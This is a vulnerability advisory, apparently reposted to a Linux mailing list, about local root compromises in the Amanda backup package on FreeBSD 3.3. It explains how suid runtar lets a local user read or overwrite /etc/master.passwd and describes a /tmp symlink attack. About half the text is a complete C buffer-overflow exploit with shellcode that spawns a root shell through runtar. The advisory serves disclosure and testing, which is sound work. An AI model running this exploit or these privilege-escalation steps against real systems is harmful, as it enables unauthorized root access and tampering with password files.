Amanda backup local root compromises
----------------------------------------------------------------------------
----
SUMMARY
The Amanda backup package comes with several UNIX distributions. This
backup application suffers from several security vulnerabilities that
allow local users to gain root privileges.
DETAILS
Vulnerable systems:
Amanda 2.3.0
Amanda 2.4.1
(Anyone running a suid version of runtar might be vulnerable as well)
Amanda's "runtar" program, suid root by default on FreeBSD 3.3, calls
/usr/bin/tar and passes all arguments given to runtar to this program. Tar
is thus run with root permissions and is vulnerable to all of the same
attacks on suid programs that it would have if it were suid itself.
Vulnerability 1 - run tar as root
Since tar is run with root permissions, you are free to tar up any file
you wish, including /etc/master.passwd. You may also untar any file you
wish, to any location on the system, including /etc/master.passwd. This
does not require any exploit and may be done by supplying arguments to
tar/runtar as if you were root.
Vulnerability 1.1 - tar contains a buffer overflow
Obtaining root via buffer overflow here is redundant, of course, but it
illustrates the point that even if tar's capabilities weren't able to gain
root privileges, the buffer overflow would still allow you to do so. An
overflow exists in tar which will allow any user to execute commands as
root.
Note that an overflow in tar isn't an immediate security flaw since it is
never suid / sgid, but it goes to show that one should do security audits
of all the programs one calls with user input. By passing a long string to
runtar in the form "/usr/local/libexec/amanda/runtar cvf $400bytes:bah" we
can execute our commands. A FreeBSD exploit is attached below.
Vulnerability 2 - symlink problem
Not quite as serious, but a concern nonetheless. When the amandad daemon
runs, a bin-owned file called "amandad.debug" in /tmp. By creating a
symlink from /tmp/amandad.debug to any other file, we will force amandad
to clobber the contents with that of amandad's debug info. Note that
amandad is not suid/sgid, but it is often run with root perms at startup
or via scripts.
The following exploit code can be used to test your system for the
mentioned vulnerability:
/*
* Amanda runtar exploit yields euid=0(root)
* Actually overflows tar 1.11.2 (included in FreeBSD 3.3)
* Tested on FreeBSD 3.3, modify shell/addr/dir for Amanda/tar on other
* platforms
*
* Compile gcc -o amandax amandax.c
* Run ./amandax <offset> <buflen>
* keep buflen around 400, try positive and negative offsets
*
* Brock Tellier [EMAIL PROTECTED]
*/
#include <stdlib.h>
#include <stdio.h>
char fbsdshell[]= /* [EMAIL PROTECTED] */
"\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9"
"\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46"
"\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51"
"\x9a>:)(:<\xe8\xc6\xff\xff\xff/bin/sh";
#define LEN 400
#define NOP 0x90
#define ALIGN 3
#define OFFSET 0
#define ADDR 0xbfbfdd90 /* fbsd 3.3 */
int main(int argc, char *argv[]) {
long int offset=OFFSET;
int i;
int buflen = LEN;
long int addr = ADDR;
char buf[LEN];
if (argc > 1) offset = atoi(argv[1]);
if (argc > 2) buflen = atoi(argv[2]);
if (argc > 3) {
fprintf(stderr, "Usage: %s <offset> <buflen>");
exit(0);
}
fprintf(stderr, "Amanda runtar exploit for FreeBSD 3.3\n");
fprintf(stderr, "Brock Tellier [EMAIL PROTECTED]\n");
fprintf(stderr, "Using addr: 0x%x\t buflen: %d\t offset: %d\n",
addr+offset, buflen, offset);
memset(buf,NOP,buflen);
memcpy(buf+100,fbsdshell,strlen(fbsdshell));
for(i= 100 + strlen(fbsdshell)+ALIGN;i<buflen-4;i+=4)*(int
*)&buf[i]=addr+offset;
execl("/usr/local/libexec/amanda/runtar", "runtar","cvf", buf, ":bah",
NULL);
exit(0);
}
ADDITIONAL INFORMATION
This vulnerability and exploit code have been provided by:
<mailto:[EMAIL PROTECTED]> Tellier, Brock.
========================================
-------
AFLHI 058009990407128029/089802---(102598//991024)
milis ini didukung oleh :
>> http://www.indolinux.com - dunia linux indonesia
-------------------------------------------------------------------
untuk berhenti kirim email ke [EMAIL PROTECTED]
untuk melihat peraturan kirim email ke [EMAIL PROTECTED]
arsip berada di http://www.mail-archive.com/[email protected]
